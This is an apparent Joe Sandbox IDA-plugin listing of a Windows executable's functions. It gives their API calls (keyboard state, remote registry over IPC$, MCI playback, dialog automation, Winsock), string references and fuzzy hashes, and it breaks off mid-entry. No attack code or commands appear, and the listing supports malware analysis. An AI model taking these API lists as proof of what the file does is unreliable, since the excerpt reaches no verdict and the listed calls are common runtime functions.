Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: 8847177f690e5fbb838b0a5ca972336c761c3e26593a40d668a8f5563d65a96e
Instruction ID: f553a6d363fbf4a7a883c75d6a5e897b5d6669543f5a15a8b96a57513eeed331
Opcode Fuzzy Hash: 8847177f690e5fbb838b0a5ca972336c761c3e26593a40d668a8f5563d65a96e
Instruction Fuzzy Hash: D0316071911129BBD720AF64DC8CEFFBB7CEF46750F200169A949E2240DB749A85DAE0

Function 00253D1E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00253D40
_wcslen.LIBCMT ref: 00253D6D
CreateDirectoryW.KERNEL32(?,00000000), ref: 00253D9D
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00253DBE
RemoveDirectoryW.KERNEL32(?), ref: 00253DCE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00253E55
CloseHandle.KERNEL32(00000000), ref: 00253E60
CloseHandle.KERNEL32(00000000), ref: 00253E6B

Strings

:, xrefs: 00253D82
\??\%s, xrefs: 00253D5B
\, xrefs: 00253D77

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
String ID: :$\$\??\%s
API String ID: 1149970189-3457252023
Opcode ID: d5c0c3c864e9475daad98dac4dcfd24ee643172d61507b17bb1792e25e6a6ed5
Instruction ID: 56dd548ac602003b8f791e6a91c786344a8f300779748c1c4f1ce042b66aab0e
Opcode Fuzzy Hash: d5c0c3c864e9475daad98dac4dcfd24ee643172d61507b17bb1792e25e6a6ed5
Instruction Fuzzy Hash: 0631857251021AABDB21DFA0DC49FEB37BCEF89741F1041B9F909D6051E77497988B24

Function 0024E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0024E6B4

Part of subcall function 001FE551: timeGetTime.WINMM(?,?,0024E6D4), ref: 001FE555

Sleep.KERNEL32(0000000A), ref: 0024E6E1
EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0024E705
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0024E727
SetActiveWindow.USER32 ref: 0024E746
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0024E754
SendMessageW.USER32(00000010,00000000,00000000), ref: 0024E773
Sleep.KERNEL32(000000FA), ref: 0024E77E
IsWindow.USER32 ref: 0024E78A
EndDialog.USER32(00000000), ref: 0024E79B

Strings

BUTTON, xrefs: 0024E719

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 1aefa4665d421fa79532817985be01ac1e069d726b8e00b07cceae343c11be9f
Instruction ID: 8ac0b99b8889afc3b7d3471fc8608602fff3b99f1ba5c072c5100f1aa81ae5bf
Opcode Fuzzy Hash: 1aefa4665d421fa79532817985be01ac1e069d726b8e00b07cceae343c11be9f
Instruction Fuzzy Hash: 14219FB0A10305EFFF085F30FCCEA257B6DF755799F611528F90A811A1DB71ACA48A24

Function 0024E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0024EA5D
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0024EA73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0024EA84
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0024EA96
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0024EAA7

Strings

open , xrefs: 0024EA0C
status PlayMe mode, xrefs: 0024EA58
play PlayMe wait, xrefs: 0024EA91
alias PlayMe, xrefs: 0024EA36
close PlayMe, xrefs: 0024EA6E, 0024EA9B
play PlayMe, xrefs: 0024EAA2

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: ef9c91b8483e1a7db702451b11622ac463aa4d2c1a9904f25896b87b83c69631
Instruction ID: 992e2d68d6efc4337bfe8f8b1871a91582013d44dec0c874e3d1fcb8eb64ba33
Opcode Fuzzy Hash: ef9c91b8483e1a7db702451b11622ac463aa4d2c1a9904f25896b87b83c69631
Instruction Fuzzy Hash: 08115431A6026A7AE724A7A2DC4EDFF6A7CFBD3B00F4504297411A20D1EF704955C5B0

Function 00245CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00245CE2
GetWindowRect.USER32(00000000,?), ref: 00245CFB
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00245D59
GetDlgItem.USER32(?,00000002), ref: 00245D69
GetWindowRect.USER32(00000000,?), ref: 00245D7B
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00245DCF
GetDlgItem.USER32(?,000003E9), ref: 00245DDD
GetWindowRect.USER32(00000000,?), ref: 00245DEF
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00245E31
GetDlgItem.USER32(?,000003EA), ref: 00245E44
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00245E5A
InvalidateRect.USER32(?,00000000,00000001), ref: 00245E67

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 1c15387e121d80bf4e91902ee933ef01663a91cf298a3dffd89e4ab6ab8357d6
Instruction ID: f77259556da5e231978ac5f88864c3e841fac6d631720d484db15c5dde590684
Opcode Fuzzy Hash: 1c15387e121d80bf4e91902ee933ef01663a91cf298a3dffd89e4ab6ab8357d6
Instruction Fuzzy Hash: 53512E70B10615AFDB18CF68DD89AAEBBB9FF88310F248129F519E6291D7709E50CB50

Function 001F8BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 001F8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,001F8BE8,?,00000000,?,?,?,?,001F8BBA,00000000,?), ref: 001F8FC5

DestroyWindow.USER32(?), ref: 001F8C81
KillTimer.USER32(00000000,?,?,?,?,001F8BBA,00000000,?), ref: 001F8D1B
DestroyAcceleratorTable.USER32(00000000), ref: 00236973
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,001F8BBA,00000000,?), ref: 002369A1
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,001F8BBA,00000000,?), ref: 002369B8
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,001F8BBA,00000000), ref: 002369D4
DeleteObject.GDI32(00000000), ref: 002369E6

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 3d5bef2129a1ecd4419f1f00edb9e23c1ed55d8bd0bb659360759307f61b1304
Instruction ID: 925c3bd001264a198a3b5cdd2e75e33355f46ccbc8fa981b2abfbbfcdbd4d7a5
Opcode Fuzzy Hash: 3d5bef2129a1ecd4419f1f00edb9e23c1ed55d8bd0bb659360759307f61b1304
Instruction Fuzzy Hash: 1261AB70512A09EFDB259F24E95CB75B7F1FB40312F64861CE2469B960CB31A9E0CFA0

Function 001F9838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 001F9944: GetWindowLongW.USER32(?,000000EB), ref: 001F9952

GetSysColor.USER32(0000000F), ref: 001F9862

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 8648196932e8a40dd6115a1fa88e7380c89fa1be7417d2bec7b87a7d786f7c20
Instruction ID: c422993d01e9da16e03abd9e20365b1dcc9410c7a92361e03af38e7cedb8d3ed
Opcode Fuzzy Hash: 8648196932e8a40dd6115a1fa88e7380c89fa1be7417d2bec7b87a7d786f7c20
Instruction Fuzzy Hash: 0541E771104648AFDF346F38AC88BB93B65FB46370F654619FAA6872E1C7319D82DB10

Function 00218D45 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Strings

. , xrefs: 0021903A, 00218FD0, 00218FF2

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-2462612998
Opcode ID: be506b8f11cb014bd21374033702a805d6fde1af10cf6d9c8be2fd899b64bdda
Instruction ID: 09883a12624fe1ca96e9d432221d4327ebb596dcd88271693ef816b39082cc33
Opcode Fuzzy Hash: be506b8f11cb014bd21374033702a805d6fde1af10cf6d9c8be2fd899b64bdda
Instruction Fuzzy Hash: DDC1E474A243499FDB21DFA8D894BEDBBF0AF29310F144199F81497292C77189E1CF60

Function 002496E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0022F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00249717
LoadStringW.USER32(00000000,?,0022F7F8,00000001), ref: 00249720

Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0022F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00249742
LoadStringW.USER32(00000000,?,0022F7F8,00000001), ref: 00249745
MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00249866

Strings

Line %d:, xrefs: 002497A0
Error: , xrefs: 0024981D
Line %d (File "%s"):, xrefs: 0024978F
^ ERROR, xrefs: 002497FB
%s (%d) : ==> %s: %s %s, xrefs: 0024984A

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 9c9a8f7d5065a6401e2d29fc1e8aa2763e5cbb03556ba7c37090a2a375bb725e
Instruction ID: 5b529dbe71e47a10e90036d4fc38e2f7d1a8148a2c0f45bb99d9a88fd89282fb
Opcode Fuzzy Hash: 9c9a8f7d5065a6401e2d29fc1e8aa2763e5cbb03556ba7c37090a2a375bb725e
Instruction Fuzzy Hash: 24415E72800649ABCF18FBE1DD86DEEB778AF65340F600065F60572092EB356F99CB61

Function 002406DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 001E6B57: _wcslen.LIBCMT ref: 001E6B6A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 002407A2
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 002407BE
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 002407DA
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00240804
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0024082C
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00240837
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0024083C

Strings

\IPC$, xrefs: 00240784
\CLSID, xrefs: 00240724
SOFTWARE\Classes\, xrefs: 0024070E

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: 4f6a57d70040d9960290a5181080fe53411d8b79a87f0dd9c4e839b6b107173d
Instruction ID: 4e501eb67a41ffdb2377e149a93dc3c1f406a55f5cf08da8f9a9e48c71c87cab
Opcode Fuzzy Hash: 4f6a57d70040d9960290a5181080fe53411d8b79a87f0dd9c4e839b6b107173d
Instruction Fuzzy Hash: 0C415872C10629ABCF25EFA1DC89CEEB778FF54350F544129E901A7161EB30AE54CBA0

Function 00263C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00263C5C
CoInitialize.OLE32(00000000), ref: 00263C8A
CoUninitialize.OLE32 ref: 00263C94
_wcslen.LIBCMT ref: 00263D2D
GetRunningObjectTable.OLE32(00000000,?), ref: 00263DB1
SetErrorMode.KERNEL32(00000001,00000029), ref: 00263ED5
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00263F0E
CoGetObject.OLE32(?,00000000,0027FB98,?), ref: 00263F2D
SetErrorMode.KERNEL32(00000000), ref: 00263F40
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00263FC4
VariantClear.OLEAUT32(?), ref: 00263FD8

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: bc14cc11341959b6699686a22afc9324fb55231955038b8737849efe32a2553e
Instruction ID: 0bbd7fb6de2896df300ebebc0528f6d0940bff0f57d8abd72000b5e8fa21e46b
Opcode Fuzzy Hash: bc14cc11341959b6699686a22afc9324fb55231955038b8737849efe32a2553e
Instruction Fuzzy Hash: F3C166716183019FD700DF68C88492BB7E9FF89744F10492DF98A9B251D731EE95CB62

Function 00257A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00257AF3
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00257B8F
SHGetDesktopFolder.SHELL32(?), ref: 00257BA3
CoCreateInstance.OLE32(0027FD08,00000000,00000001,002A6E6C,?), ref: 00257BEF
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00257C74
CoTaskMemFree.OLE32(?,?), ref: 00257CCC
SHBrowseForFolderW.SHELL32(?), ref: 00257D57
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00257D7A
CoTaskMemFree.OLE32(00000000), ref: 00257D81
CoTaskMemFree.OLE32(00000000), ref: 00257DD6
CoUninitialize.OLE32 ref: 00257DDC

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: be6b83bb2afab580667c1658b9968302f8712dc2b77c41c2f55be924bef5645f
Instruction ID: e05ce6da79d2b6a352ef3e04b0a5eea67fd7b06b17cfbacf2c38f06aec23468e
Opcode Fuzzy Hash: be6b83bb2afab580667c1658b9968302f8712dc2b77c41c2f55be924bef5645f
Instruction Fuzzy Hash: EFC14C75A14109AFCB14DFA4D888DAEBBF9FF48305B148499E81ADB361D730ED45CB90

Function 0027541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00275504
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00275515
CharNextW.USER32(00000158), ref: 00275544
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00275585
SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0027559B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002755AC

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: MessageSend$CharNext
String ID:
API String ID: 1350042424-0
Opcode ID: 6040cbde07ab70a658c578c11d62ff0843d950c87f2d9879a1744c68ac459686
Instruction ID: 095240bf76f90fde06d6ff7762eecb2a6ad8b40cca443c501a19564dd6d540ba
Opcode Fuzzy Hash: 6040cbde07ab70a658c578c11d62ff0843d950c87f2d9879a1744c68ac459686
Instruction Fuzzy Hash: 2761B430920629EFDF108F60DC859FFBB79FF05760F508149F619A6290D7B49AA0DB60

Function 0023FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0023FAAF
SafeArrayAllocData.OLEAUT32(?), ref: 0023FB08
VariantInit.OLEAUT32(?), ref: 0023FB1A
SafeArrayAccessData.OLEAUT32(?,?), ref: 0023FB3A
VariantCopy.OLEAUT32(?,?), ref: 0023FB8D
SafeArrayUnaccessData.OLEAUT32(?), ref: 0023FBA1
VariantClear.OLEAUT32(?), ref: 0023FBB6
SafeArrayDestroyData.OLEAUT32(?), ref: 0023FBC3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0023FBCC
VariantClear.OLEAUT32(?), ref: 0023FBDE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0023FBE9

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: de8e0db11960257adbd816a8d45f2298f7bb009021f09f116babd1250e380130
Instruction ID: 4a0ad46e7643d8ed3553f34748c23f08dafabc1e1f28a2f8cb46891382b0d118
Opcode Fuzzy Hash: de8e0db11960257adbd816a8d45f2298f7bb009021f09f116babd1250e380130
Instruction Fuzzy Hash: 164162B5E102199FCB00DF64EC689AEBBB9FF18344F108069E955A7261D730A955CF90

Function 00249C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00249CA1
GetAsyncKeyState.USER32(000000A0), ref: 00249D22
GetKeyState.USER32(000000A0), ref: 00249D3D
GetAsyncKeyState.USER32(000000A1), ref: 00249D57
GetKeyState.USER32(000000A1), ref: 00249D6C
GetAsyncKeyState.USER32(00000011), ref: 00249D84
GetKeyState.USER32(00000011), ref: 00249D96
GetAsyncKeyState.USER32(00000012), ref: 00249DAE
GetKeyState.USER32(00000012), ref: 00249DC0
GetAsyncKeyState.USER32(0000005B), ref: 00249DD8
GetKeyState.USER32(0000005B), ref: 00249DEA

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: f376d463465aab13342d0297aa8e54cc4d3041f6afca04ed9c6acc2cdb95b92b
Instruction ID: 54c653b469bfbe80367b59f0a585d2c4a68ef34319dd4862ddabfd8bf256b25b
Opcode Fuzzy Hash: f376d463465aab13342d0297aa8e54cc4d3041f6afca04ed9c6acc2cdb95b92b
Instruction Fuzzy Hash: 3A41E830A147CB6DFF389F74C8443B7BEA0AB16304F44805ECAC6561C2D7A599E4CB92

Function 0026055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 002605BC
inet_addr.WSOCK32(?), ref: 0026061C
gethostbyname.WSOCK32(?), ref: 00260628
